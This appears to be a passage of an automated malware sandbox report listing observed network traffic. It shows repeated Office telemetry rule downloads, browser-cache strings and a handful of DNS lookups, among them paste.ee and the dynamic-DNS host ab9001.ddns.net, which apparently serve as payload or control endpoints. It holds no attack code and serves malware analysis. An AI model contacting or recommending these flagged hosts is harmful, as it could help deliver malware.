            Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dx+SZ2r9+LVmadL&MD=TD8vCUGP HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: </section>`}function mie(e=xT,t=Vd){return za(gz,e,t)}function gie(e=AT,t=ET){return za(NB,e,t)}var AI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(AI||{}),mke={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function rx(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(AI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(jY.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),g={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: </section>`}function mie(e=xT,t=Vd){return za(gz,e,t)}function gie(e=AT,t=ET){return za(NB,e,t)}var AI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(AI||{}),mke={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function rx(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(AI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(jY.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),g={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
            Source: chromecache_212.15.dr, chromecache_186.15.drString found in binary or memory: </section>`}function mie(e=xT,t=Vd){return za(gz,e,t)}function gie(e=AT,t=ET){return za(NB,e,t)}var AI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(AI||{}),mke={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function rx(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(AI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(jY.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),g={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: global trafficDNS traffic detected: DNS query: ab9001.ddns.net
            Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
            Source: svchost.exe, 0000000E.00000002.3369902405.000001C4FB200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 0000000E.00000002.3370220975.000001C4FB284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
            Source: svchost.exe, 0000000E.00000002.3370220975.000001C4FB284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/059
            Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: svchost.exe, 0000000E.00000002.3370220975.000001C4FB263000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3370538874.000001C4FB2C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2939238100.000001C4FB122000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3368558787.000001C4F6502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3370764827.000001C4FB30A000.00000004.00000020.00020000.00000000.sdmp, edb.log.14.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
            Source: svchost.exe, 0000000E.00000002.3370220975.000001C4FB284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80.
            Source: svchost.exe, 0000000E.00000002.3370036548.000001C4FB22A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
            Source: edb.log.14.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
